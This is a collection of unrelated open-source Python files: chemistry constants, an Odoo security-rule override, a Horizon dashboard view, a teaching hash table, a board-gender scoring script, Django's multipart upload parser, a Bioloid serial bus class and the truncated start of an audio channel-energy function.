# the atomic masses are given in atomic mass units
atomic_masses = np.array([
0.00000, # X
1.00794, # H
4.00260, # He
6.94100, # Li
9.01218, # Be
10.81100, # B
12.01100, # C
14.00670, # N
15.99940, # O
18.99840, # F
20.17970, # Ne
22.98977, # Na
24.30500, # Mg
26.98154, # Al
28.08550, # Si
30.97376, # P
32.06600, # S
35.45270, # Cl
39.94800, # Ar
39.09830, # K
40.07800, # Ca
44.95590, # Sc
47.88000, # Ti
50.94150, # V
51.99600, # Cr
54.93800, # Mn
55.84700, # Fe
58.93320, # Co
58.69340, # Ni
63.54600, # Cu
65.39000, # Zn
69.72300, # Ga
72.61000, # Ge
74.92160, # As
78.96000, # Se
79.90400, # Br
83.80000, # Kr
85.46780, # Rb
87.62000, # Sr
88.90590, # Y
91.22400, # Zr
92.90640, # Nb
95.94000, # Mo
np.nan, # Tc
101.07000, # Ru
102.90550, # Rh
106.42000, # Pd
107.86800, # Ag
112.41000, # Cd
114.82000, # In
118.71000, # Sn
121.75700, # Sb
127.60000, # Te
126.90450, # I
131.29000, # Xe
132.90540, # Cs
137.33000, # Ba
138.90550, # La
140.12000, # Ce
140.90770, # Pr
144.24000, # Nd
np.nan, # Pm
150.36000, # Sm
151.96500, # Eu
157.25000, # Gd
158.92530, # Tb
162.50000, # Dy
164.93030, # Ho
167.26000, # Er
168.93420, # Tm
173.04000, # Yb
174.96700, # Lu
178.49000, # Hf
180.94790, # Ta
183.85000, # W
186.20700, # Re
190.20000, # Os
192.22000, # Ir
195.08000, # Pt
196.96650, # Au
200.59000, # Hg
204.38300, # Tl
207.20000, # Pb
208.98040, # Bi
np.nan, # Po
np.nan, # At
np.nan, # Rn
np.nan, # Fr
226.02540, # Ra
np.nan, # Ac
232.03810, # Th
231.03590, # Pa
238.02900, # U
237.04820, # Np
np.nan, # Pu
np.nan, # Am
np.nan, # Cm
np.nan, # Bk
np.nan, # Cf
np.nan, # Es
np.nan, # Fm
np.nan, # Md
np.nan, # No
np.nan]).astype(np.float) # Lw
# an array of covalent radii of atoms
#
# 1st column -> single bond
# 2nd column -> double bond
# 3rd column -> triple bond
#
# adapted from http://en.wikipedia.org/w/index.php?title=Covalent_radius&oldid=623288198
#
# based on
# P. Pyykkö, M. Atsumi (2009). "Molecular Single-Bond Covalent Radii for Elements 1-118".
# Chemistry: A European Journal 15: 186–197. doi:10.1002/chem.200800987
#
# P. Pyykkö, M. Atsumi (2009). "Molecular Double-Bond Covalent Radii for Elements Li–E112".
# Chemistry: A European Journal 15 (46): 12770–12779. doi:10.1002/chem.200901472
#
# P. Pyykkö, S. Riedel, M. Patzschke (2005). "Triple-Bond Covalent Radii".
# Chemistry: A European Journal 11 (12): 3511–3520. doi:10.1002/chem.200401299
#
# Bohr units are used
covalent_radii = np.array([
[0.605, np.nan, np.nan], # H
[0.869, np.nan, np.nan], # He
[2.513, 2.343, np.nan], # Li
[1.928, 1.701, 1.606], # Be
[1.606, 1.474, 1.379], # B
[1.417, 1.266, 1.134], # C
[1.342, 1.134, 1.020], # N
[1.191, 1.077, 1.002], # O
[1.209, 1.115, 1.002], # F
[1.266, 1.814, np.nan], # Ne
[2.929, 3.024, np.nan], # Na
[2.627, 2.494, 2.400], # Mg
[2.381, 2.135, 2.098], # Al
[2.192, 2.022, 1.928], # Si
[2.098, 1.928, 1.776], # P
[1.946, 1.776, 1.795], # S
[1.871, 1.795, 1.757], # Cl
[1.814, 2.022, 1.814], # Ar
[3.704, 3.647, np.nan], # K
[3.231, 2.778, 2.513], # Ca
[2.797, 2.192, 2.154], # Sc
[2.570, 2.211, 2.041], # Ti
[2.532, 2.116, 2.003], # V
[2.305, 2.098, 1.946], # Cr
[2.249, 1.984, 1.946], # Mn
[2.192, 2.060, 1.928], # Fe
[2.098, 1.946, 1.814], # Co
[2.079, 1.909, 1.909], # Ni
[2.116, 2.173, 2.268], # Cu
[2.230, 2.268, np.nan], # Zn
[2.343, 2.211, 2.287], # Ga
[2.287, 2.098, 2.154], # Ge
[2.287, 2.154, 2.003], # As
[2.192, 2.022, 2.022], # Se
[2.154, 2.060, 2.079], # Br
[2.211, 2.287, 2.041], # Kr
[3.968, 3.817, np.nan], # Rb
[3.496, 2.967, 2.627], # Sr
[3.080, 2.457, 2.343], # Y
[2.910, 2.400, 2.287], # Zr
[2.778, 2.362, 2.192], # Nb
[2.608, 2.287, 2.135], # Mo
[2.419, 2.268, 2.079], # Tc
[2.362, 2.154, 1.946], # Ru
[2.362, 2.079, 2.003], # Rh
[2.268, 2.211, 2.116], # Pd
[2.419, 2.627, 2.589], # Ag
[2.570, 2.721, np.nan], # Cd
[2.683, 2.570, 2.759], # In
[2.646, 2.457, 2.494], # Sn
[2.646, 2.513, 2.400], # Sb
[2.570, 2.419, 2.287], # Te
[2.513, 2.438, 2.362], # I
[2.476, 2.551, 2.305], # Xe
[4.384, 3.950, np.nan], # Cs
[3.704, 3.042, 2.816], # Ba
[3.402, 2.627, 2.627], # La
[3.080, 2.589, 2.476], # Ce
[3.326, 2.608, 2.419], # Pr
[3.288, 2.589, np.nan], # Nd
[3.269, 2.551, np.nan], # Pm
[3.250, 2.532, np.nan], # Sm
[3.175, 2.532, np.nan], # Eu
[3.194, 2.551, 2.494], # Gd
[3.175, 2.551, np.nan], # Tb
[3.156, 2.513, np.nan], # Dy
[3.137, 2.513, np.nan], # Ho
[3.118, 2.513, np.nan], # Er
[3.099, 2.476, np.nan], # Tm
[3.213, 2.438, np.nan], # Yb
[3.061, 2.476, 2.476], # Lu
[2.872, 2.419, 2.305], # Hf
[2.759, 2.381, 2.249], # Ta
[2.589, 2.268, 2.173], # W
[2.476, 2.249, 2.079], # Re
[2.438, 2.192, 2.060], # Os
[2.305, 2.173, 2.022], # Ir
[2.324, 2.116, 2.079], # Pt
[2.343, 2.287, 2.324], # Au
[2.513, 2.683, np.nan], # Hg
[2.721, 2.683, 2.835], # Tl
[2.721, 2.551, 2.589], # Pb
[2.853, 2.665, 2.551], # Bi
[2.740, 2.551, 2.438], # Po
[2.778, 2.608, 2.608], # At
[2.683, 2.740, 2.513], # Rn
[4.214, 4.120, np.nan], # Fr
[3.798, 3.269, 3.005], # Ra
[3.515, 2.891, 2.646], # Ac
[3.307, 2.702, 2.570], # Th
[3.194, 2.608, 2.438], # Pa
[3.213, 2.532, 2.230], # U
[3.231, 2.570, 2.192], # Np
[3.250, 2.551, np.nan], # Pu
[3.137, 2.551, np.nan], # Am
[3.137, 2.570, np.nan], # Cm
[3.175, 2.627, np.nan], # Bk
[3.175, 2.646, np.nan], # Cf
[3.118, 2.646, np.nan], # Es
[3.156, np.nan, np.nan], # Fm
[3.269, 2.627, np.nan], # Md
[3.326, np.nan, np.nan], # No
[3.042, 2.665, np.nan], # Lr
[2.967, 2.646, 2.476], # Rf
[2.816, 2.570, 2.381], # Db
[2.702, 2.419, 2.287], # Sg
[2.665, 2.419, 2.249], # Bh
[2.532, 2.362, 2.230], # Hs
[2.438, 2.362, 2.135], # Mt
[2.419, 2.192, 2.116], # Ds
[2.287, 2.192, 2.230], # Rg
[2.305, 2.589, 2.457], # Cn
[2.570, np.nan, np.nan], # Uut
[2.702, np.nan, np.nan], # Fl
[3.061, np.nan, np.nan], # Uup
[3.307, np.nan, np.nan], # Lv
[3.118, np.nan, np.nan], # Uus
[2.967, np.nan, np.nan]]).astype(np.float) # Uuo
def correct_symbol_case(chem_symbol):
"""
correct the chemical symbol to be in the form:
Upperlower
example:
correct_symbol_case('he') -> 'He'
correct_symbol_case('HE') -> 'He'
correct_symbol_case('He') -> 'He'
correct_symbol_case('C') -> 'C'
correct_symbol_case('c') -> 'C'
:param chem_symbol: the chemical symbol to correct
:return: a correct case chemical symbol
"""
# make sure chemical symbol is not longer than 2.
sym_length = len(chem_symbol)
if sym_length > 2:
raise Exception('Found error while reading the chemical symbol \"{}\"'.format(chem_symbol))
elif sym_length == 2:
return chem_symbol[0].upper() + chem_symbol[1].lower()
elif sym_length == 1:
return chem_symbol.upper()
def mass_for_sym(symbol):
"""
:param symbol:
:return: the atomic mass of the chemical symbol
"""
if len(chemical_symbols) != len(atomic_masses):
raise Exception('\"chem_symbol\" list and \"atomic_masses\" numpy array are not '
'the same size.')
try:
index = chemical_symbols.index(symbol)
except ValueError:
print('Chemical symbol \"{}\" does not exist'.format(symbol))
return 0
mass = constants.dict_of_atomic_masses[symbol]
return mass
def number_for_sym(symbol):
"""
:param symbol:
:return: the atomic number of the chemical symbol
"""
try:
number = chemical_symbols.index(symbol)
except ValueError:
print("{} is not a symbol of an atom".format(symbol))
return number
| EhudTsivion/QCkit | atom.py | Python | lgpl-3.0 | 13,288 |
# -*- coding: utf-8 -*-
##############################################################################
#
# This module copyright (C) 2015 Therp BV (<http://therp.nl>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from odoo import models, api
from ..base_suspend_security import BaseSuspendSecurityUid
class IrRule(models.Model):
_inherit = 'ir.rule'
@api.model
def domain_get(self, model_name, mode='read'):
if isinstance(self.env.uid, BaseSuspendSecurityUid):
return [], [], ['"%s"' % self.pool[model_name]._table]
return super(IrRule, self).domain_get(model_name, mode=mode)
| thinkopensolutions/server-tools | base_suspend_security/models/ir_rule.py | Python | agpl-3.0 | 1,346 |
# Copyright (C) 2015 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import forms
from openstack_dashboard.dashboards.identity.identity_providers.protocols \
import forms as protocol_forms
class AddProtocolView(forms.ModalFormView):
template_name = 'identity/identity_providers/protocols/create.html'
form_id = "create_protocol_form"
form_class = protocol_forms.AddProtocolForm
submit_label = _("Create Protocol")
success_url = "horizon:identity:identity_providers:protocols_tab"
page_title = _("Create Protocol")
def __init__(self):
super(AddProtocolView, self).__init__()
def get_success_url(self):
return reverse(self.success_url,
args=(self.kwargs['identity_provider_id'],))
def get_context_data(self, **kwargs):
context = super(AddProtocolView, self).get_context_data(**kwargs)
context["submit_url"] = reverse(
"horizon:identity:identity_providers:protocols:create",
args=(self.kwargs['identity_provider_id'],))
return context
def get_initial(self):
return {"idp_id": self.kwargs['identity_provider_id']}
| noironetworks/horizon | openstack_dashboard/dashboards/identity/identity_providers/protocols/views.py | Python | apache-2.0 | 1,791 |
import random
class intDict(object):
"""A dictionary with integer keys"""
def __init__(self, numBuckets):
"""Create an empty dictionary"""
self.buckets = []
self.numBuckets = numBuckets
for i in range(numBuckets):
self.buckets.append([])
def addEntry(self, dictKey, dictVal):
"""Assumes dictKey an int. Adds an entry."""
hashBucket = self.buckets[dictKey%self.numBuckets]
for i in range(len(hashBucket)):
if hashBucket[i][0] == dictKey:
hashBucket[i] = (dictKey, dictVal)
return
hashBucket.append((dictKey, dictVal))
def getValue(self, dictKey):
"""Assumes dictKey an int. Returns entry associated
with the key dictKey"""
hashBucket = self.buckets[dictKey%self.numBuckets]
for e in hashBucket:
if e[0] == dictKey:
return e[1]
return None
def __str__(self):
res = ''
for b in self.buckets:
for t in b:
res = res + str(t[0]) + ':' + str(t[1]) + ','
return '{' + res[:-1] + '}' #res[:-1] removes the last comma
D = intDict(29)
for i in range(29):
#choose a random int in range(10**5)
key = random.choice(range(10**5))
D.addEntry(key, i)
print '\n', 'The buckets are:'
for hashBucket in D.buckets: #violates abstraction barrier
print ' ', hashBucket
| parmarmanojkumar/MITx_Python | 6002x/week2/lectureCode_intDict.py | Python | mit | 1,482 |
#!/usr/bin/env python
import csv
import json
import sys
import click
def score(company, sexbiases):
"""
Given a company record with board of directors and executive names,
return our guess of the % of governance that is male.
Since names are not always unambiguous determinants of sex, we also
return an error bound, with 0.0 being perfect and 1.0 being possibly 100%
wrong.
"""
men = 0
error = 0.0
governors = company['board'] + company['executives']
# Get all governor names, de-duping since board/exec team may overlap
names = set([governor.get('name', '') for governor in governors])
for name in names:
first_name = name.split(' ')[0].strip().title()
bias = sexbiases.get(first_name, 0.0) # Assume male if not known, with maximal error bound
if bias <= 0.0:
men += 1
error += 1.0 - abs(bias)
count = len(names)
return (men/count, error/count)
@click.command()
@click.option('--companies', type=click.File(mode='rt'), required=True, help="A companies data file, as created by symbol-to-company-details.")
@click.option('--sexbiases', type=click.File(mode='rt'), required=True, help="A sex bias CSV datafile, as in first_name_sex_bias.csv")
def corpscore(companies, sexbiases):
sexbias_reader = csv.reader(sexbiases)
sexbiases = dict([item[0], float(item[1])] for item in sexbias_reader)
fieldnames = ['symbol', 'url', 'percent_men', 'error', 'description']
writer = csv.DictWriter(sys.stdout, fieldnames=fieldnames)
writer.writeheader()
for company_json in companies:
company = json.loads(company_json)
percent_men, error = score(company, sexbiases)
writer.writerow({
'symbol': company['symbol'],
'url': company.get('url'),
'percent_men': percent_men,
'error': error,
'description': company.get('description'),
})
sys.stdout.flush()
if __name__ == '__main__':
corpscore()
| hipsterware/scoreline | toys/corpscore.py | Python | agpl-3.0 | 2,066 |
"""
Multi-part parsing for file uploads.
Exposes one class, ``MultiPartParser``, which feeds chunks of uploaded data to
file upload handlers for processing.
"""
import cgi
from django.conf import settings
from django.core.exceptions import SuspiciousOperation
from django.utils.datastructures import MultiValueDict
from django.utils.encoding import force_unicode
from django.utils.text import unescape_entities
from django.core.files.uploadhandler import StopUpload, SkipFile, StopFutureHandlers
__all__ = ('MultiPartParser', 'MultiPartParserError', 'InputStreamExhausted')
class MultiPartParserError(Exception):
pass
class InputStreamExhausted(Exception):
"""
No more reads are allowed from this device.
"""
pass
RAW = "raw"
FILE = "file"
FIELD = "field"
class MultiPartParser(object):
"""
A rfc2388 multipart/form-data parser.
``MultiValueDict.parse()`` reads the input stream in ``chunk_size`` chunks
and returns a tuple of ``(MultiValueDict(POST), MultiValueDict(FILES))``.
"""
def __init__(self, META, input_data, upload_handlers, encoding=None):
"""
Initialize the MultiPartParser object.
:META:
The standard ``META`` dictionary in Django request objects.
:input_data:
The raw post data, as a file-like object.
:upload_handler:
An UploadHandler instance that performs operations on the uploaded
data.
:encoding:
The encoding with which to treat the incoming data.
"""
#
# Content-Type should contain multipart and the boundary information.
#
content_type = META.get('HTTP_CONTENT_TYPE', META.get('CONTENT_TYPE', ''))
if not content_type.startswith('multipart/'):
raise MultiPartParserError('Invalid Content-Type: %s' % content_type)
# Parse the header to get the boundary to split the parts.
ctypes, opts = parse_header(content_type)
boundary = opts.get('boundary')
if not boundary or not cgi.valid_boundary(boundary):
raise MultiPartParserError('Invalid boundary in multipart: %s' % boundary)
#
# Content-Length should contain the length of the body we are about
# to receive.
#
try:
content_length = int(META.get('HTTP_CONTENT_LENGTH', META.get('CONTENT_LENGTH',0)))
except (ValueError, TypeError):
# For now set it to 0; we'll try again later on down.
content_length = 0
if content_length < 0:
# This means we shouldn't continue...raise an error.
raise MultiPartParserError("Invalid content length: %r" % content_length)
self._boundary = boundary
self._input_data = input_data
# For compatibility with low-level network APIs (with 32-bit integers),
# the chunk size should be < 2^31, but still divisible by 4.
possible_sizes = [x.chunk_size for x in upload_handlers if x.chunk_size]
self._chunk_size = min([2**31-4] + possible_sizes)
self._meta = META
self._encoding = encoding or settings.DEFAULT_CHARSET
self._content_length = content_length
self._upload_handlers = upload_handlers
def parse(self):
"""
Parse the POST data and break it into a FILES MultiValueDict and a POST
MultiValueDict.
Returns a tuple containing the POST and FILES dictionary, respectively.
"""
# We have to import QueryDict down here to avoid a circular import.
from django.http import QueryDict
encoding = self._encoding
handlers = self._upload_handlers
# HTTP spec says that Content-Length >= 0 is valid
# handling content-length == 0 before continuing
if self._content_length == 0:
return QueryDict(MultiValueDict(), encoding=self._encoding), MultiValueDict()
limited_input_data = LimitBytes(self._input_data, self._content_length)
# See if the handler will want to take care of the parsing.
# This allows overriding everything if somebody wants it.
for handler in handlers:
result = handler.handle_raw_input(limited_input_data,
self._meta,
self._content_length,
self._boundary,
encoding)
if result is not None:
return result[0], result[1]
# Create the data structures to be used later.
self._post = QueryDict('', mutable=True)
self._files = MultiValueDict()
# Instantiate the parser and stream:
stream = LazyStream(ChunkIter(limited_input_data, self._chunk_size))
# Whether or not to signal a file-completion at the beginning of the loop.
old_field_name = None
counters = [0] * len(handlers)
try:
for item_type, meta_data, field_stream in Parser(stream, self._boundary):
if old_field_name:
# We run this at the beginning of the next loop
# since we cannot be sure a file is complete until
# we hit the next boundary/part of the multipart content.
self.handle_file_complete(old_field_name, counters)
old_field_name = None
try:
disposition = meta_data['content-disposition'][1]
field_name = disposition['name'].strip()
except (KeyError, IndexError, AttributeError):
continue
transfer_encoding = meta_data.get('content-transfer-encoding')
if transfer_encoding is not None:
transfer_encoding = transfer_encoding[0].strip()
field_name = force_unicode(field_name, encoding, errors='replace')
if item_type == FIELD:
# This is a post field, we can just set it in the post
if transfer_encoding == 'base64':
raw_data = field_stream.read()
try:
data = str(raw_data).decode('base64')
except:
data = raw_data
else:
data = field_stream.read()
self._post.appendlist(field_name,
force_unicode(data, encoding, errors='replace'))
elif item_type == FILE:
# This is a file, use the handler...
file_name = disposition.get('filename')
if not file_name:
continue
file_name = force_unicode(file_name, encoding, errors='replace')
file_name = self.IE_sanitize(unescape_entities(file_name))
content_type = meta_data.get('content-type', ('',))[0].strip()
try:
charset = meta_data.get('content-type', (0,{}))[1].get('charset', None)
except:
charset = None
try:
content_length = int(meta_data.get('content-length')[0])
except (IndexError, TypeError, ValueError):
content_length = None
counters = [0] * len(handlers)
try:
for handler in handlers:
try:
handler.new_file(field_name, file_name,
content_type, content_length,
charset)
except StopFutureHandlers:
break
for chunk in field_stream:
if transfer_encoding == 'base64':
# We only special-case base64 transfer encoding
try:
chunk = str(chunk).decode('base64')
except Exception, e:
# Since this is only a chunk, any error is an unfixable error.
raise MultiPartParserError("Could not decode base64 data: %r" % e)
for i, handler in enumerate(handlers):
chunk_length = len(chunk)
chunk = handler.receive_data_chunk(chunk,
counters[i])
counters[i] += chunk_length
if chunk is None:
# If the chunk received by the handler is None, then don't continue.
break
except SkipFile, e:
# Just use up the rest of this file...
exhaust(field_stream)
else:
# Handle file upload completions on next iteration.
old_field_name = field_name
else:
# If this is neither a FIELD or a FILE, just exhaust the stream.
exhaust(stream)
except StopUpload, e:
if not e.connection_reset:
exhaust(limited_input_data)
else:
# Make sure that the request data is all fed
exhaust(limited_input_data)
# Signal that the upload has completed.
for handler in handlers:
retval = handler.upload_complete()
if retval:
break
return self._post, self._files
def handle_file_complete(self, old_field_name, counters):
"""
Handle all the signalling that takes place when a file is complete.
"""
for i, handler in enumerate(self._upload_handlers):
file_obj = handler.file_complete(counters[i])
if file_obj:
# If it returns a file object, then set the files dict.
self._files.appendlist(force_unicode(old_field_name,
self._encoding,
errors='replace'),
file_obj)
break
def IE_sanitize(self, filename):
"""Cleanup filename from Internet Explorer full paths."""
return filename and filename[filename.rfind("\\")+1:].strip()
class LazyStream(object):
"""
The LazyStream wrapper allows one to get and "unget" bytes from a stream.
Given a producer object (an iterator that yields bytestrings), the
LazyStream object will support iteration, reading, and keeping a "look-back"
variable in case you need to "unget" some bytes.
"""
def __init__(self, producer, length=None):
"""
Every LazyStream must have a producer when instantiated.
A producer is an iterable that returns a string each time it
is called.
"""
self._producer = producer
self._empty = False
self._leftover = ''
self.length = length
self.position = 0
self._remaining = length
self._unget_history = []
def tell(self):
return self.position
def read(self, size=None):
def parts():
remaining = (size is not None and [size] or [self._remaining])[0]
# do the whole thing in one shot if no limit was provided.
if remaining is None:
yield ''.join(self)
return
# otherwise do some bookkeeping to return exactly enough
# of the stream and stashing any extra content we get from
# the producer
while remaining != 0:
assert remaining > 0, 'remaining bytes to read should never go negative'
chunk = self.next()
emitting = chunk[:remaining]
self.unget(chunk[remaining:])
remaining -= len(emitting)
yield emitting
out = ''.join(parts())
return out
def next(self):
"""
Used when the exact number of bytes to read is unimportant.
This procedure just returns whatever chunk is conveniently returned
from the iterator instead. Useful to avoid unnecessary bookkeeping if
performance is an issue.
"""
if self._leftover:
output = self._leftover
self._leftover = ''
else:
output = self._producer.next()
self._unget_history = []
self.position += len(output)
return output
def close(self):
"""
Used to invalidate/disable this lazy stream.
Replaces the producer with an empty list. Any leftover bytes that have
already been read will still be reported upon read() and/or next().
"""
self._producer = []
def __iter__(self):
return self
def unget(self, bytes):
"""
Places bytes back onto the front of the lazy stream.
Future calls to read() will return those bytes first. The
stream position and thus tell() will be rewound.
"""
if not bytes:
return
self._update_unget_history(len(bytes))
self.position -= len(bytes)
self._leftover = ''.join([bytes, self._leftover])
def _update_unget_history(self, num_bytes):
"""
Updates the unget history as a sanity check to see if we've pushed
back the same number of bytes in one chunk. If we keep ungetting the
same number of bytes many times (here, 50), we're most likely in an
infinite loop of some sort. This is usually caused by a
maliciously-malformed MIME request.
"""
self._unget_history = [num_bytes] + self._unget_history[:49]
number_equal = len([current_number for current_number in self._unget_history
if current_number == num_bytes])
if number_equal > 40:
raise SuspiciousOperation(
"The multipart parser got stuck, which shouldn't happen with"
" normal uploaded files. Check for malicious upload activity;"
" if there is none, report this to the Django developers."
)
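# Added sketch (not part of Django): LazyStream lets the parser read ahead and
# push unconsumed bytes back, which is what BoundaryIter relies on when it
# overshoots a boundary.
#
#   stream = LazyStream(iter(['abcdef']))
#   stream.read(4)      # 'abcd' (position is now 4)
#   stream.unget('cd')  # rewind two bytes
#   stream.read()       # 'cdef'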
class ChunkIter(object):
"""
An iterable that will yield chunks of data. Given a file-like object as the
constructor, this object will yield chunks of read operations from that
object.
"""
def __init__(self, flo, chunk_size=64 * 1024):
self.flo = flo
self.chunk_size = chunk_size
def next(self):
try:
data = self.flo.read(self.chunk_size)
except InputStreamExhausted:
raise StopIteration()
if data:
return data
else:
raise StopIteration()
def __iter__(self):
return self
class LimitBytes(object):
""" Limit bytes for a file object. """
def __init__(self, fileobject, length):
self._file = fileobject
self.remaining = length
def read(self, num_bytes=None):
"""
Read data from the underlying file.
If you ask for too much or there isn't anything left,
this will raise an InputStreamExhausted error.
"""
if self.remaining <= 0:
raise InputStreamExhausted()
if num_bytes is None:
num_bytes = self.remaining
else:
num_bytes = min(num_bytes, self.remaining)
self.remaining -= num_bytes
return self._file.read(num_bytes)
class InterBoundaryIter(object):
"""
A Producer that will iterate over boundaries.
"""
def __init__(self, stream, boundary):
self._stream = stream
self._boundary = boundary
def __iter__(self):
return self
def next(self):
try:
return LazyStream(BoundaryIter(self._stream, self._boundary))
except InputStreamExhausted:
raise StopIteration()
class BoundaryIter(object):
"""
A Producer that is sensitive to boundaries.
Will happily yield bytes until a boundary is found. Will yield the bytes
before the boundary, throw away the boundary bytes themselves, and push the
post-boundary bytes back on the stream.
The future calls to .next() after locating the boundary will raise a
StopIteration exception.
"""
def __init__(self, stream, boundary):
self._stream = stream
self._boundary = boundary
self._done = False
# rollback an additional six bytes because the format is like
# this: CRLF<boundary>[--CRLF]
self._rollback = len(boundary) + 6
# Try to use mx fast string search if available. Otherwise
# use Python find. Wrap the latter for consistency.
unused_char = self._stream.read(1)
if not unused_char:
raise InputStreamExhausted()
self._stream.unget(unused_char)
try:
from mx.TextTools import FS
self._fs = FS(boundary).find
except ImportError:
self._fs = lambda data: data.find(boundary)
def __iter__(self):
return self
def next(self):
if self._done:
raise StopIteration()
stream = self._stream
rollback = self._rollback
bytes_read = 0
chunks = []
for bytes in stream:
bytes_read += len(bytes)
chunks.append(bytes)
if bytes_read > rollback:
break
if not bytes:
break
else:
self._done = True
if not chunks:
raise StopIteration()
chunk = ''.join(chunks)
boundary = self._find_boundary(chunk, len(chunk) < self._rollback)
if boundary:
end, next = boundary
stream.unget(chunk[next:])
self._done = True
return chunk[:end]
else:
# make sure we dont treat a partial boundary (and
# its separators) as data
if not chunk[:-rollback]:# and len(chunk) >= (len(self._boundary) + 6):
# There's nothing left, we should just return and mark as done.
self._done = True
return chunk
else:
stream.unget(chunk[-rollback:])
return chunk[:-rollback]
def _find_boundary(self, data, eof = False):
"""
Finds a multipart boundary in data.
If no boundary exists in the data, None is returned. Otherwise,
a tuple containing the indices of the following is returned:
* the end of current encapsulation
* the start of the next encapsulation
"""
index = self._fs(data)
if index < 0:
return None
else:
end = index
next = index + len(self._boundary)
# backup over CRLF
if data[max(0,end-1)] == '\n':
end -= 1
if data[max(0,end-1)] == '\r':
end -= 1
return end, next
def exhaust(stream_or_iterable):
"""
Completely exhausts an iterator or stream.
Raise a MultiPartParserError if the argument is not a stream or an iterable.
"""
iterator = None
try:
iterator = iter(stream_or_iterable)
except TypeError:
iterator = ChunkIter(stream_or_iterable, 16384)
if iterator is None:
raise MultiPartParserError('multipartparser.exhaust() was passed a non-iterable or stream parameter')
for __ in iterator:
pass
def parse_boundary_stream(stream, max_header_size):
"""
Parses one and exactly one stream that encapsulates a boundary.
"""
# Stream at beginning of header, look for end of header
# and parse it if found. The header must fit within one
# chunk.
chunk = stream.read(max_header_size)
# 'find' returns the top of these four bytes, so we'll
# need to munch them later to prevent them from polluting
# the payload.
header_end = chunk.find('\r\n\r\n')
def _parse_header(line):
main_value_pair, params = parse_header(line)
try:
name, value = main_value_pair.split(':', 1)
        except ValueError:
raise ValueError("Invalid header: %r" % line)
return name, (value, params)
if header_end == -1:
# we find no header, so we just mark this fact and pass on
# the stream verbatim
stream.unget(chunk)
return (RAW, {}, stream)
header = chunk[:header_end]
# here we place any excess chunk back onto the stream, as
# well as throwing away the CRLFCRLF bytes from above.
stream.unget(chunk[header_end + 4:])
TYPE = RAW
outdict = {}
# Eliminate blank lines
for line in header.split('\r\n'):
# This terminology ("main value" and "dictionary of
# parameters") is from the Python docs.
try:
name, (value, params) = _parse_header(line)
        except ValueError:
continue
if name == 'content-disposition':
TYPE = FIELD
if params.get('filename'):
TYPE = FILE
outdict[name] = value, params
if TYPE == RAW:
stream.unget(chunk)
return (TYPE, outdict, stream)
class Parser(object):
def __init__(self, stream, boundary):
self._stream = stream
self._separator = '--' + boundary
def __iter__(self):
boundarystream = InterBoundaryIter(self._stream, self._separator)
for sub_stream in boundarystream:
# Iterate over each part
yield parse_boundary_stream(sub_stream, 1024)
def parse_header(line):
""" Parse the header into a key-value. """
plist = _parse_header_params(';' + line)
key = plist.pop(0).lower()
pdict = {}
for p in plist:
i = p.find('=')
if i >= 0:
name = p[:i].strip().lower()
value = p[i+1:].strip()
if len(value) >= 2 and value[0] == value[-1] == '"':
value = value[1:-1]
value = value.replace('\\\\', '\\').replace('\\"', '"')
pdict[name] = value
return key, pdict
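# --- Hedged usage sketch (not part of the original module) ---
# Illustrates what parse_header() produces for a typical multipart header
# line; the sample line and the values shown below are made up.
#
#     key, params = parse_header(
#         'Content-Disposition: form-data; name="avatar"; filename="photo.png"')
#     key    -> 'content-disposition: form-data'
#     params -> {'name': 'avatar', 'filename': 'photo.png'}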
def _parse_header_params(s):
plist = []
while s[:1] == ';':
s = s[1:]
end = s.find(';')
while end > 0 and s.count('"', 0, end) % 2:
end = s.find(';', end + 1)
if end < 0:
end = len(s)
f = s[:end]
plist.append(f.strip())
s = s[end:]
return plist
| JuliBakagianni/CEF-ELRC | lib/python2.7/site-packages/django/http/multipartparser.py | Python | bsd-3-clause | 22,951 |
"""This module implements a serial bus class which talks to bioloid
devices through a serial port.
"""
import serial
from bus import Bus
class SerialBus(Bus):
"""Implements a BioloidBus which sends commands to a bioloid device
via a BioloidSerialPort.
"""
    def __init__(self, port, baud=1000000, show=Bus.SHOW_NONE):
Bus.__init__(self, show)
self.serial_port = serial.Serial(port=port,
baudrate=baud,
timeout=0.1,
bytesize=serial.EIGHTBITS,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
xonxoff=False,
rtscts=False,
dsrdtr=False)
def read_byte(self):
"""Reads a byte from the bus. This function will return None if
no character was read within the designated timeout.
The max Return Delay time is 254 x 2 usec = 508 usec (the
default is 500 usec). This represents the minimum time between
receiving a packet and sending a response.
"""
data = self.serial_port.read()
if data:
return data[0]
return None
def write_packet(self, packet_data):
"""Function implemented by a derived class which actually writes
the data to a device.
"""
self.serial_port.write(packet_data)
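    # --- Hedged usage sketch (not part of the original module) ---
    # Opening a bus on a USB serial adapter; the device path below is
    # illustrative, and real hardware plus the accompanying bus module are
    # required for this to do anything useful.
    #
    #     bus = SerialBus('/dev/ttyUSB0', baud=1000000)
    #     byte = bus.read_byte()                    # None if nothing arrives in 0.1 s
    #     bus.write_packet(b'\xff\xff\x01\x02\x01\xfb')   # illustrative raw packet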
| dhylands/bioloid3 | bioloid/serial_bus.py | Python | mit | 1,568 |
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 5 16:24:58 2019
@author: beimx004
"""
import numpy as np
def channelEnergyFunc(par,X,gAgc):
strat = par['parent'];
startBin = strat['startBin']-1 # subtract 1 for python indexing
nBinLims = strat['nBinLims'];
nHop = strat['nHop']
nFrames = X.shape[1];
nChan = nBinLims.size
assert isinstance(gAgc,np.ndarray) or gAgc.size == 0,'gAgc, if supplied, must be a vector!'
    # determine if AGC is sample-based and decimate to frame rate if necessary
lenAgcIn = gAgc.shape[1]
if lenAgcIn > nFrames:
